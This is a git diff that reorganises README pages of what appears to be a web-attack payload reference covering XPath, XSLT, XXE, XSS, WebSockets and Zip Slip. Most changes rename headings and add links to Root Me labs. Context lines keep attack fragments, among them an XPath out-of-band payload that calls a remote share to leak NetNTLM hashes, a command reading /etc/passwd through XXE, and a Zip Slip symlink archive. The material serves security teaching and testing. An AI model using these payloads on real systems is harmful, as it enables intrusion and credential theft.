diff --git a/Client Side Path Traversal/README.md b/Client Side Path Traversal/README.md
index d8bacf7..04901bd 100644
--- a/Client Side Path Traversal/README.md
+++ b/Client Side Path Traversal/README.md
@@ -65,6 +65,7 @@ Real-World Scenarios:
## Labs
* [doyensec/CSPTPlayground](https://github.com/doyensec/CSPTPlayground) - CSPTPlayground is an open-source playground to find and exploit Client-Side Path Traversal (CSPT).
+* [Root Me - CSPT - The Ruler](https://www.root-me.org/en/Challenges/Web-Client/CSPT-The-Ruler)
## References
diff --git a/Web Sockets/README.md b/Web Sockets/README.md
index 1936857..a62b25e 100644
--- a/Web Sockets/README.md
+++ b/Web Sockets/README.md
@@ -1,11 +1,12 @@
# Web Sockets
-> The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server
+> WebSocket is a communication protocol that provides full-duplex communication channels over a single, long-lived connection. This enables real-time, bi-directional communication between clients (typically web browsers) and servers through a persistent connection. WebSockets are commonly used for web applications that require frequent, low-latency updates, such as live chat applications, online gaming, real-time notifications, and financial trading platforms.
+
## Summary
* [Tools](#tools)
-* [Exploit](#exploit)
+* [Methodology](#methodology)
* [Using wsrepl](#using-wsrepl)
* [Using ws-harness.py](#using-ws-harness-py)
* [Cross-Site WebSocket Hijacking (CSWSH)](#cross-site-websocket-hijacking-cswsh)
@@ -19,7 +20,7 @@
* [mfowl/ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)
-## Exploit
+## Methodology
### Using wsrepl
@@ -131,6 +132,7 @@ in order to add this header.
* [PortSwigger - Manipulating WebSocket messages to exploit vulnerabilities](https://portswigger.net/web-security/websockets/lab-manipulating-messages-to-exploit-vulnerabilities)
* [PortSwigger - Cross-site WebSocket hijacking](https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking/lab)
* [PortSwigger - Manipulating the WebSocket handshake to exploit vulnerabilities](https://portswigger.net/web-security/websockets/lab-manipulating-handshake-to-exploit-vulnerabilities)
+* [Root Me - Web Socket - 0 protection](https://www.root-me.org/en/Challenges/Web-Client/Web-Socket-0-protection)
## References
diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md
index 15c8b06..706678f 100644
--- a/XPATH Injection/README.md
+++ b/XPATH Injection/README.md
@@ -2,12 +2,14 @@
> XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
+
## Summary
* [Tools](#tools)
-* [Exploitation](#exploitation)
-* [Blind exploitation](#blind-exploitation)
-* [Out Of Band Exploitation](#out-of-band-exploitation)
+* [Methodology](#methodology)
+ * [Blind exploitation](#blind-exploitation)
+ * [Out Of Band Exploitation](#out-of-band-exploitation)
+* [Labs](#labs)
* [References](#references)
## Tools
@@ -19,7 +21,7 @@
- [Harshal35/XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool
-## Exploitation
+## Methodology
Similar to SQL : `"string(//user[name/text()='" +vuln_var1+ "' and password/text()=’" +vuln_var1+ "']/account/text())"`
@@ -42,7 +44,7 @@ search=Har') and contains(../password,'c
search=Har') and starts-with(../password,'c
```
-## Blind Exploitation
+### Blind Exploitation
1. Size of a string
```sql
@@ -54,12 +56,20 @@ search=Har') and starts-with(../password,'c
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
```
-## Out Of Band Exploitation
+### Out Of Band Exploitation
```powershell
http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
```
+
+## Labs
+
+* [Root Me - XPath injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-Authentication)
+* [Root Me - XPath injection - String](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-String)
+* [Root Me - XPath injection - Blind](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-Blind)
+
+
## References
- [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
diff --git a/XSLT Injection/README.md b/XSLT Injection/README.md
index 984ce88..25f6b5a 100644
--- a/XSLT Injection/README.md
+++ b/XSLT Injection/README.md
@@ -2,11 +2,11 @@
> Processing an un-validated XSL stylesheet can allow an attacker to change the structure and contents of the resultant XML, include arbitrary files from the file system, or execute arbitrary code
+
## Summary
-- [Summary](#summary)
- [Tools](#tools)
-- [Exploit](#exploit)
+- [Methodology](#methodology)
- [Determine the vendor and version](#determine-the-vendor-and-version)
- [External Entity](#external-entity)
- [Read files and SSRF using document](#read-files-and-ssrf-using-document)
@@ -14,11 +14,18 @@
- [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper)
- [Remote Code Execution with Java](#remote-code-execution-with-java)
- [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net)
+- [Labs](#labs)
- [References](#references)
+
## Tools
-## Exploit
+No known tools currently exist to assist with XSLT exploitation.
+
+* [TODO](#)
+
+
+## Methodology
### Determine the vendor and version
@@ -238,6 +245,11 @@ return proc.StandardOutput.ReadToEnd();
```
+## Labs
+
+- [Root Me - XSLT - Code execution](https://www.root-me.org/en/Challenges/Web-Server/XSLT-Code-execution)
+
+
## References
- [From XSLT code execution to Meterpreter shells - Nicolas Grégoire (@agarri) - July 2, 2012](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html)
diff --git a/XSS Injection/3 - XSS Common WAF Bypass.md b/XSS Injection/3 - XSS Common WAF Bypass.md
index 878bbf4..ed7858f 100644
--- a/XSS Injection/3 - XSS Common WAF Bypass.md
+++ b/XSS Injection/3 - XSS Common WAF Bypass.md
@@ -1,5 +1,8 @@
# Common WAF Bypass
+> WAFs are designed to filter out malicious content by inspecting incoming and outgoing traffic for patterns indicative of attacks. Despite their sophistication, WAFs often struggle to keep up with the diverse methods attackers use to obfuscate and modify their payloads to circumvent detection.
+
+
## Summary
* [Cloudflare](#cloudflare)
@@ -9,6 +12,7 @@
* [WordFence WAF](#wordfence-waf)
* [Fortiweb WAF](#fortiweb-waf)
+
## Cloudflare
* 25st January 2021 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
diff --git a/XSS Injection/4 - CSP Bypass.md b/XSS Injection/4 - CSP Bypass.md
index 8f86860..5012d0c 100644
--- a/XSS Injection/4 - CSP Bypass.md
+++ b/XSS Injection/4 - CSP Bypass.md
@@ -14,6 +14,7 @@
- [Bypass CSP script-src data](#bypass-csp-script-src-data)
- [Bypass CSP nonce](#bypass-csp-nonce)
- [Bypass CSP header sent by PHP](#bypass-csp-header-sent-by-php)
+- [Labs](#labs)
- [References](#references)
@@ -173,6 +174,15 @@ GET /?xss=&a&a&a&a&a&a&a&a...[REPEATED &a 1000 times]&a
Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070)
+## Labs
+
+* [Root Me - CSP Bypass - Inline Code](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Inline-code)
+* [Root Me - CSP Bypass - Nonce](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Nonce)
+* [Root Me - CSP Bypass - Nonce 2](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Nonce-2)
+* [Root Me - CSP Bypass - Dangling Markup](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Dangling-markup)
+* [Root Me - CSP Bypass - Dangling Markup 2](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Dangling-markup-2)
+* [Root Me - CSP Bypass - JSONP](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-JSONP)
+
## References
diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 40075ec..70c0992 100644
--- a/XSS Injection/README.md
+++ b/XSS Injection/README.md
@@ -2,9 +2,10 @@
> Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.
+
## Summary
-- [Vulnerability Details](#vulnerability-details)
+- [Methodology](#methodology)
- [Proof of Concept](#proof-of-concept)
- [Data Grabber](#data-grabber)
- [CORS](#cors)
@@ -38,10 +39,11 @@
- [Blind XSS endpoint](#blind-xss-endpoint)
- [Tips](#tips)
- [Mutated XSS](#mutated-xss)
+- [Labs](#labs)
- [References](#references)
-## Vulnerability Details
+## Methodology
Cross-Site Scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS allows attackers to inject malicious code into a website, which is then executed in the browser of anyone who visits the site. This can allow attackers to steal sensitive information, such as user login credentials, or to perform other malicious actions.
@@ -556,6 +558,18 @@ Mutated XSS from Masato Kinugawa, used against DOMPurify component on Google Sea
## Labs
* [PortSwigger Labs for XSS](https://portswigger.net/web-security/all-labs#cross-site-scripting)
+* [Root Me - XSS - Reflected](https://www.root-me.org/en/Challenges/Web-Client/XSS-Reflected)
+* [Root Me - XSS - Server Side](https://www.root-me.org/en/Challenges/Web-Server/XSS-Server-Side)
+* [Root Me - XSS - Stored 1](https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-1)
+* [Root Me - XSS - Stored 2](https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-2)
+* [Root Me - XSS - Stored - Filter Bypass](https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-filter-bypass)
+* [Root Me - XSS DOM Based - Introduction](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Introduction)
+* [Root Me - XSS DOM Based - AngularJS](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-AngularJS)
+* [Root Me - XSS DOM Based - Eval](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Eval)
+* [Root Me - XSS DOM Based - Filters Bypass](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Filters-Bypass)
+* [Root Me - XSS - DOM Based](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based)
+* [Root Me - Self XSS - DOM Secrets](https://www.root-me.org/en/Challenges/Web-Client/Self-XSS-DOM-Secrets)
+* [Root Me - Self XSS - Race Condition](https://www.root-me.org/en/Challenges/Web-Client/Self-XSS-Race-Condition)
## References
diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index f8457f3..c0d3ffe 100644
--- a/XXE Injection/README.md
+++ b/XXE Injection/README.md
@@ -2,10 +2,10 @@
> An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities. XML entities can be used to tell the XML parser to fetch specific content on the server.
+
## Summary
- [Tools](#tools)
-- [Labs](#labs)
- [Detect the vulnerability](#detect-the-vulnerability)
- [Exploiting XXE to retrieve files](#exploiting-xxe-to-retrieve-files)
- [Classic XXE](#classic-xxe)
@@ -35,6 +35,9 @@
- [XXE inside XLSX file](#xxe-inside-xlsx-file)
- [XXE inside DTD file](#xxe-inside-dtd-file)
- [Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents](#windows-local-dtd-and-side-channel-leak-to-disclose-http-responsefile-contents)
+- [Labs](#labs)
+- [References](#references)
+
## Tools
@@ -88,20 +91,6 @@
python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "TEMPLATEFILE" "TARGETURL" "BASE64ENCODE" "DOCTYPE" "XMLTAG" --outputbase "./output-generic-solr" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs
```
-## Labs
-
-* [PortSwigger Labs for XXE](https://portswigger.net/web-security/all-labs#xml-external-entity-xxe-injection)
- * [Exploiting XXE using external entities to retrieve files](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files)
- * [Exploiting XXE to perform SSRF attacks](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf)
- * [Blind XXE with out-of-band interaction](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction)
- * [Blind XXE with out-of-band interaction via XML parameter entities](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities)
- * [Exploiting blind XXE to exfiltrate data using a malicious external DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration)
- * [Exploiting blind XXE to retrieve data via error messages](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages)
- * [Exploiting XInclude to retrieve files](https://portswigger.net/web-security/xxe/lab-xinclude-attack)
- * [Exploiting XXE via image file upload](https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload)
- * [Exploiting XXE to retrieve data by repurposing a local DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-trigger-error-message-by-repurposing-local-dtd)
-* [GoSecure workshop - Advanced XXE Exploitation](https://gosecure.github.io/xxe-workshop)
-
## Detect the vulnerability
@@ -730,6 +719,22 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
]>cacat
```
+## Labs
+
+* [Root Me - XML External Entity](https://www.root-me.org/en/Challenges/Web-Server/XML-External-Entity)
+* [PortSwigger Labs for XXE](https://portswigger.net/web-security/all-labs#xml-external-entity-xxe-injection)
+ * [Exploiting XXE using external entities to retrieve files](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files)
+ * [Exploiting XXE to perform SSRF attacks](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf)
+ * [Blind XXE with out-of-band interaction](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction)
+ * [Blind XXE with out-of-band interaction via XML parameter entities](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities)
+ * [Exploiting blind XXE to exfiltrate data using a malicious external DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration)
+ * [Exploiting blind XXE to retrieve data via error messages](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages)
+ * [Exploiting XInclude to retrieve files](https://portswigger.net/web-security/xxe/lab-xinclude-attack)
+ * [Exploiting XXE via image file upload](https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload)
+ * [Exploiting XXE to retrieve data by repurposing a local DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-trigger-error-message-by-repurposing-local-dtd)
+* [GoSecure workshop - Advanced XXE Exploitation](https://gosecure.github.io/xxe-workshop)
+
+
## References
- [A Deep Dive into XXE Injection - Trenton Gordon - July 22, 2019](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/)
diff --git a/Zip Slip/README.md b/Zip Slip/README.md
index 28ebe2b..c46f9e7 100644
--- a/Zip Slip/README.md
+++ b/Zip Slip/README.md
@@ -2,11 +2,12 @@
> The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../shell.php). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine.
+
## Summary
* [Tools](#tools)
-* [Detection](#detection)
-* [Exploits](#exploits)
+* [Methodology](#methodology)
+ * [Detection](#detection)
* [Basic Exploit](#basic-exploit)
* [Additional Notes](#additional-notes)
@@ -17,13 +18,13 @@
- [usdAG/slipit](https://github.com/usdAG/slipit) - Utility for creating ZipSlip archives
-## Detection
+## Methodology
+
+### Detection
Any ZIP upload page on the application.
-## Exploits
-
### Basic Exploit
Using [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc):
@@ -39,6 +40,7 @@ ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
```
+
### Additional Notes
For affected libraries and projects, visit [snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability)